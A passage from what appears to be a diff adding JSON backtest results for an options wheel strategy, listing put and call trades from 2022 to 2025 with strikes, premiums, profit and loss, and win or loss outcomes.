2.5200213669369003, + "close_cost": 0.5073525693018928, + "pnl": 195.28687976350076, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-04-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.11, + "spot": 36.84428024291992, + "premium": 2.080717245972801, + "close_cost": 0.7708671789175128, + "pnl": 125.00500670552883, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-04-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.81, + "spot": 27.206146240234375, + "premium": 1.4921421810802329, + "close_cost": 0.4358028749827527, + "pnl": 99.65393060974802, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-04-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.31, + "spot": 24.915510177612305, + "premium": 0.8408287923681161, + "close_cost": 0.29139316177086716, + "pnl": 48.96356305972489, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-05-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 20.29, + "spot": 23.779897689819336, + "premium": 1.1041311401415053, + "close_cost": 0.29616984498782495, + "pnl": 74.81612951536803, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-05-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 21.3, + "spot": 21.828975677490234, + "premium": 1.3335898006822529, + "close_cost": 0.0, + "pnl": 127.37898006822529, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 20.52, + "spot": 23.857547760009766, + "premium": 1.533263813377463, + "close_cost": 0.4037572592100984, + "pnl": 106.97065541673645, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 18.58, + "spot": 19.596576690673828, + "premium": 1.5311558508569698, + "close_cost": 0.6471707222426213, + "pnl": 82.41851286143485, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.05, + "spot": 25.429933547973633, + "premium": 1.7323190859485624, + "close_cost": 0.1721928317152761, + "pnl": 150.03262542332865, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-06-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 21.83, + "spot": 23.876956939697266, + "premium": 1.5088631902605236, + "close_cost": 0.523793929018602, + "pnl": 92.52692612419216, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-06-17 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 17.16, + "spot": 13.297329902648926, + "premium": 1.1153964084638535, + "close_cost": 3.8626700973510744, + "pnl": -277.7173688887221, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-24 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.56, + "spot": 15.365039825439453, + "premium": 1.0492330128059741, + "close_cost": 1.8050398254394526, + "pnl": -78.57068126334785, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-01 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 14.44, + "spot": 11.273527145385742, + "premium": 0.9690392512593347, + "close_cost": 3.1664728546142573, + "pnl": -222.73336033549228, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-08 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 11.5, + "spot": 13.518512725830078, + "premium": 0.8067892928752238, + "close_cost": 2.018512725830078, + "pnl": -124.16234329548543, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.71, + "spot": 13.67401123046875, + "premium": 0.7890504002680947, + "close_cost": 0.08328098531888095, + "pnl": 64.59694149492137, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-07-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.8, + "spot": 16.47295379638672, + "premium": 0.7338578494808496, + "close_cost": 0.05414342720956178, + "pnl": 61.991442227128786, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-07-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 16.12, + "spot": 18.202861785888672, + "premium": 0.7853013497838486, + "close_cost": 0.09110020906626892, + "pnl": 63.44011407175796, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-08-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 18.12, + "spot": 19.446836471557617, + "premium": 0.8139981056410681, + "close_cost": 0.37560920913904816, + "pnl": 37.85888965020199, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-08-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 19.73, + "spot": 20.302064895629883, + "premium": 0.9485373378003024, + "close_cost": 0.297864443414392, + "pnl": 59.08728943859103, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-08-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 17.51, + "spot": 18.7762508392334, + "premium": 0.8000877503693546, + "close_cost": 0.09832026927474224, + "pnl": 64.19674810946124, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-09-02 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 14.6, + "spot": 12.498064041137695, + "premium": 0.8176300401867929, + "close_cost": 2.1019359588623043, + "pnl": -131.42059186755117, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-09-09 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 12.75, + "spot": 14.237686157226562, + "premium": 0.8846372782477916, + "close_cost": 1.4876861572265625, + "pnl": -63.294887897877096, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-09-16 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 13.38, + "spot": 11.720580101013184, + "premium": 0.6303802620168115, + "close_cost": 1.6594198989868172, + "pnl": -105.89396369700056, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-09-21 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 11.95, + "spot": 11.115421295166016, + "premium": 0.7871174828029819, + "close_cost": 0.14385215375225657, + "pnl": 58.34653290507252, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-09-29 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 9.98, + "spot": 9.05809211730957, + "premium": 0.5540884185179147, + "close_cost": 0.00992069460273648, + "pnl": 48.43677239151782, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-10-07 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.81, + "spot": 8.98008918762207, + "premium": 0.4420530714511548, + "close_cost": 0.17008918762206982, + "pnl": 24.2063883829085, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-10-14 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 8.44, + "spot": 6.75700569152832, + "premium": 0.44189627179137503, + "close_cost": 1.6829943084716792, + "pnl": -127.09980366803042, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-10-21 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 6.89, + "spot": 8.36581802368164, + "premium": 0.48080056452348696, + "close_cost": 1.475818023681641, + "pnl": -102.4917459158154, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-10-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 7.86, + "spot": 9.02884292602539, + "premium": 0.4660538184898142, + "close_cost": 0.10206520339391045, + "pnl": 30.418861509590375, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-11-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.71, + "spot": 8.765583038330078, + "premium": 0.5372665051957375, + "close_cost": 0.0, + "pnl": 47.74665051957375, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-11-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.24, + "spot": 9.350603103637695, + "premium": 0.4407602975113907, + "close_cost": 0.13438784697446504, + "pnl": 24.657245053692563, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-11-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.45, + "spot": 12.57797622680664, + "premium": 0.8549294386351303, + "close_cost": 0.3625663434933979, + "pnl": 43.25630951417324, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-11-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.79, + "spot": 13.475010871887207, + "premium": 0.8857366701493525, + "close_cost": 0.16759081564987133, + "pnl": 65.83458544994812, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-12-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.94, + "spot": 12.304966926574707, + "premium": 0.9151793467585625, + "close_cost": 0.29480169175026827, + "pnl": 56.05776550082942, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-12-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.29, + "spot": 12.655978202819824, + "premium": 0.5266978153078758, + "close_cost": 0.17091402828484492, + "pnl": 29.59837870230309, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-12-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 10.18, + "spot": 10.900660514831543, + "premium": 0.43610820872284206, + "close_cost": 0.12204374428630738, + "pnl": 25.426446443653468, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-12-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.99, + "spot": 9.462242126464844, + "premium": 0.41249907349565884, + "close_cost": 0.05262852243209726, + "pnl": 30.00705510635616, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2023-01-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 10.0, + "spot": 11.282279968261719, + "premium": 0.44820374298641497, + "close_cost": 0.13484559215990544, + "pnl": 25.355815082650953, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-01-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.91, + "spot": 12.779410362243652, + "premium": 0.5030665664954928, + "close_cost": 0.17381577860426356, + "pnl": 26.94507878912292, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2023-02-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.53, + "spot": 16.067222595214844, + "premium": 0.668337981774572, + "close_cost": 0.27746779508527375, + "pnl": 33.107018668929825, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-02-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.26, + "spot": 14.756011009216309, + "premium": 0.6472718719863471, + "close_cost": 0.18310536677626654, + "pnl": 40.43665052100805, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2023-02-28 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.16, + "spot": 14.335248947143555, + "premium": 0.5806481530849972, + "close_cost": 0.18858448691587748, + "pnl": 33.226366616911974, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2023-06-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 20.2, + "spot": 21.681407928466797, + "premium": 0.9965540351804023, + "close_cost": 0.4135973227819454, + "pnl": 52.315671239845685, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-07-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.99, + "spot": 25.64668083190918, + "premium": 0.6510835507601929, + "close_cost": 0.0981198979907103, + "pnl": 49.31636527694826, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2023-07-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.97, + "spot": 27.88450813293457, + "premium": 0.6837123223828048, + "close_cost": 0.3347481700880728, + "pnl": 28.9164152294732, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-08-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.95, + "spot": 25.185375213623047, + "premium": 0.6728479336034585, + "close_cost": 0.22957777081038255, + "pnl": 38.347016279307596, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-08-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 19.5, + "spot": 22.505874633789062, + "premium": 0.5605037906096868, + "close_cost": 0.08236741254844193, + "pnl": 41.833637806124486, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-08-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 18.59, + "spot": 21.47529411315918, + "premium": 0.4934203714720269, + "close_cost": 0.08054862694155274, + "pnl": 35.30717445304741, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-08-28 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 19.06, + "spot": 21.023801803588867, + "premium": 0.5720403324958001, + "close_cost": 0.20057065800379048, + "pnl": 31.166967449200964, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-09-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.16, + "spot": 23.575706481933594, + "premium": 0.6508098372487376, + "close_cost": 0.28367597063488503, + "pnl": 30.733386661385257, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2023-09-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 19.84, + "spot": 20.83731460571289, + "premium": 0.5737504460893481, + "close_cost": 0.1505104350781421, + "pnl": 36.3440011011206, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2023-11-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 16.99, + "spot": 18.286243438720703, + "premium": 0.4903938591876802, + "close_cost": 0.1692844910678617, + "pnl": 26.13093681198185, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2023-11-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 19.04, + "spot": 21.766523361206055, + "premium": 0.6001694072418227, + "close_cost": 0.08147469431198462, + "pnl": 45.8894712929838, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-01-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.02, + "spot": 28.013225555419922, + "premium": 0.7457188980197378, + "close_cost": 0.09724367273354306, + "pnl": 58.867522528619475, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-01-16 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.03, + "spot": 28.762081146240234, + "premium": 0.7141516233721887, + "close_cost": 0.11496391955622576, + "pnl": 53.9387703815963, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-01-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.5, + "spot": 34.52632522583008, + "premium": 1.0155685325283628, + "close_cost": 0.39762974070506196, + "pnl": 55.81387918233008, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-02-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.17, + "spot": 34.585445404052734, + "premium": 0.7915083547603263, + "close_cost": 0.2147489788734216, + "pnl": 51.69593758869047, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-02-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.21, + "spot": 40.605873107910156, + "premium": 1.1205988957207467, + "close_cost": 0.36732815453529355, + "pnl": 69.34707411854531, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-03-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.34, + "spot": 48.85316848754883, + "premium": 1.9532614266212391, + "close_cost": 0.8334447827334337, + "pnl": 106.00166438878054, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-03-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 39.59, + "spot": 42.79898452758789, + "premium": 1.8150313585457418, + "close_cost": 0.44992416334919483, + "pnl": 130.5307195196547, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2024-03-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.04, + "spot": 45.85606002807617, + "premium": 1.6698298252748707, + "close_cost": 0.5069139017295186, + "pnl": 110.31159235453521, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2024-04-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.43, + "spot": 43.39067840576172, + "premium": 0.9932157603826077, + "close_cost": 0.34465047812440996, + "pnl": 58.87652822581977, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-04-19 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.48, + "spot": 30.36361312866211, + "premium": 0.7829686640652795, + "close_cost": 8.116386871337887, + "pnl": -736.3318207272608, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-04-26 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 30.97, + "spot": 39.24884033203125, + "premium": 1.279395938693547, + "close_cost": 8.278840332031251, + "pnl": -702.9344393337705, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-04-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.89, + "spot": 40.04762268066406, + "premium": 1.2894098785143004, + "close_cost": 0.592879903092987, + "pnl": 63.67299754213134, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-05-06 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.12, + "spot": 40.728065490722656, + "premium": 1.4408391956506623, + "close_cost": 0.4434508440043503, + "pnl": 93.7588351646312, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-05-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.03, + "spot": 42.61161804199219, + "premium": 1.3450169272281638, + "close_cost": 0.2476365014733659, + "pnl": 103.75804257547979, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-05-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 42.09, + "spot": 47.58182144165039, + "premium": 1.0171872648793254, + "close_cost": 0.18070231171351825, + "pnl": 77.66849531658072, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-06-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.08, + "spot": 53.20288848876953, + "premium": 1.0326904932021197, + "close_cost": 0.2598041663412154, + "pnl": 71.30863268609043, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-06-28 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 53.95, + "spot": 54.74663162231445, + "premium": 1.3538940581498515, + "close_cost": 0.0, + "pnl": 129.40940581498515, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-07-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 51.46, + "spot": 56.96181106567383, + "premium": 1.3434887498124635, + "close_cost": 0.23571387450552272, + "pnl": 104.79748753069407, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-07-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 56.53, + "spot": 63.597469329833984, + "premium": 1.1023609800483154, + "close_cost": 0.177796538486227, + "pnl": 86.47644415620884, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-07-16 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 59.44, + "spot": 64.57649993896484, + "premium": 1.4495348317912047, + "close_cost": 0.36579115071408275, + "pnl": 102.3943681077122, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-07-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.69, + "spot": 52.34355545043945, + "premium": 1.8230125680538904, + "close_cost": 0.3041453779322225, + "pnl": 145.9067190121668, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-07-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.97, + "spot": 43.89817428588867, + "premium": 2.1556439266916936, + "close_cost": 0.4976091405456655, + "pnl": 159.8234786146028, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2024-08-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.27, + "spot": 31.111433029174805, + "premium": 2.254111209071441, + "close_cost": 0.187624398972968, + "pnl": 200.66868100984732, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-08-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.83, + "spot": 34.88911056518555, + "premium": 2.6109516432785895, + "close_cost": 0.5682193230606556, + "pnl": 198.29323202179341, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.93, + "spot": 41.13908386230469, + "premium": 3.3310459458481603, + "close_cost": 1.6342712793814709, + "pnl": 163.69746664666894, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-08-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.56, + "spot": 38.3602180480957, + "premium": 3.1445286551114595, + "close_cost": 0.0, + "pnl": 308.4728655111459, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-09-06 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 36.06, + "spot": 25.67237091064453, + "premium": 1.8948060291619662, + "close_cost": 10.387629089355471, + "pnl": -852.2723060193505, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-09-13 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 26.19, + "spot": 33.059608459472656, + "premium": 1.973291721309753, + "close_cost": 6.869608459472655, + "pnl": -492.62167381629024, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-09-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.08, + "spot": 34.73088455200195, + "premium": 1.7677159032888117, + "close_cost": 0.11135221663449535, + "pnl": 159.65636866543164, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-09-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.19, + "spot": 34.74289321899414, + "premium": 1.8304909322330811, + "close_cost": 0.5185004524178582, + "pnl": 125.21904798152228, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.07, + "spot": 34.881587982177734, + "premium": 2.064807496223324, + "close_cost": 0.9853517771870699, + "pnl": 101.96557190362539, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-10-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 34.16, + "spot": 37.110599517822266, + "premium": 1.16112370246376, + "close_cost": 0.3659430497564662, + "pnl": 73.53806527072938, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.84, + "spot": 33.97016906738281, + "premium": 0.9835072342140894, + "close_cost": 0.20002782794917362, + "pnl": 72.36794062649157, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-11-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.71, + "spot": 31.087308883666992, + "premium": 0.9336556063592862, + "close_cost": 0.3149050993610709, + "pnl": 55.895050699821525, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-11-15 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 32.97, + "spot": 26.411334991455078, + "premium": 1.2284397008958603, + "close_cost": 6.558665008544921, + "pnl": -536.012530764906, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-11-22 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 26.94, + "spot": 28.224266052246094, + "premium": 1.3033480274566447, + "close_cost": 1.2842660522460925, + "pnl": -1.0818024789447787, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-11-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.53, + "spot": 29.05643081665039, + "premium": 0.9241172529547299, + "close_cost": 0.3853221354983969, + "pnl": 47.899511745633305, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-12-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.42, + "spot": 29.39691925048828, + "premium": 0.7617245140657491, + "close_cost": 0.13144896486767665, + "pnl": 57.047554919807254, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-01-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.73, + "spot": 29.625417709350586, + "premium": 0.8858212488827188, + "close_cost": 0.0, + "pnl": 82.60212488827189, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-01-06 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.85, + "spot": 32.27799987792969, + "premium": 0.9119729542317376, + "close_cost": 0.1489566442774577, + "pnl": 70.321630995428, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-01-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.2, + "spot": 27.936511993408203, + "premium": 0.9244983349830953, + "close_cost": 0.37957656280752694, + "pnl": 48.51217721755684, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-01-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 30.34, + "spot": 33.47016525268555, + "premium": 0.9874576585688644, + "close_cost": 0.16384062566460544, + "pnl": 76.38170329042589, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-02-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.23, + "spot": 27.519254684448242, + "premium": 1.1807916908643712, + "close_cost": 0.22977787398653593, + "pnl": 89.12138168778353, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-02-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.59, + "spot": 27.171537399291992, + "premium": 1.0773536831099761, + "close_cost": 0.41808176117815066, + "pnl": 59.947192193182545, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-02-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.66, + "spot": 29.794309616088867, + "premium": 1.1042420554113708, + "close_cost": 0.2306678116218368, + "pnl": 81.37742437895339, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-02-28 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 26.9, + "spot": 22.581684112548828, + "premium": 1.1345477754589162, + "close_cost": 4.3183158874511705, + "pnl": -321.3668111992254, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-03-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.03, + "spot": 20.376169204711914, + "premium": 1.1589774436338534, + "close_cost": 0.20913109791634898, + "pnl": 89.00463457175043, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 21.16, + "spot": 17.87261199951172, + "premium": 1.3009466651023551, + "close_cost": 0.17116322110294258, + "pnl": 106.99834439994125, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-03-21 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.06, + "spot": 19.154193878173828, + "premium": 1.4097511457274212, + "close_cost": 0.0, + "pnl": 134.99511457274212, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-27 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 19.54, + "spot": 17.698894500732422, + "premium": 1.3150676188137584, + "close_cost": 0.03904249215856481, + "pnl": 121.62251266551935, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-04-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 16.29, + "spot": 11.370742797851562, + "premium": 1.021519772038495, + "close_cost": 3.7357528340669136e-06, + "pnl": 96.1716036285661, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-04-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.87, + "spot": 10.194802284240723, + "premium": 0.787113815135565, + "close_cost": 1.3248022842407234, + "pnl": -56.75884691051585, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.58, + "spot": 10.563529968261719, + "premium": 1.0703507542168231, + "close_cost": 0.4988500988691298, + "pnl": 51.170065534769336, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-04-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.56, + "spot": 12.118162155151367, + "premium": 1.2931363501049429, + "close_cost": 0.620992134303803, + "pnl": 61.23442158011399, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-05-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.45, + "spot": 13.234308242797852, + "premium": 1.3927134543684065, + "close_cost": 0.6047293127877751, + "pnl": 72.81841415806313, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-05-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.22, + "spot": 17.071062088012695, + "premium": 0.5101325363484195, + "close_cost": 0.03478468101095855, + "pnl": 41.5547855337461, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-05-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.74, + "spot": 17.230512619018555, + "premium": 0.5541609968512224, + "close_cost": 0.05530549881038427, + "pnl": 43.90554980408382, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 15.15, + "spot": 16.841854095458984, + "premium": 0.6297093010471073, + "close_cost": 0.2073571379531649, + "pnl": 36.25521630939424, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.16, + "spot": 39.13999938964844, + "premium": 1.2858712105859702, + "close_cost": 0.1614175368158417, + "pnl": 106.46536737701284, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.87, + "spot": 42.2400016784668, + "premium": 1.7982622091041964, + "close_cost": 0.6807207361428134, + "pnl": 105.77414729613831, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-10-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.55, + "spot": 46.84000015258789, + "premium": 2.102340235067482, + "close_cost": 0.5828020955297397, + "pnl": 145.97381395377423, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-11-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 39.24, + "spot": 44.959999084472656, + 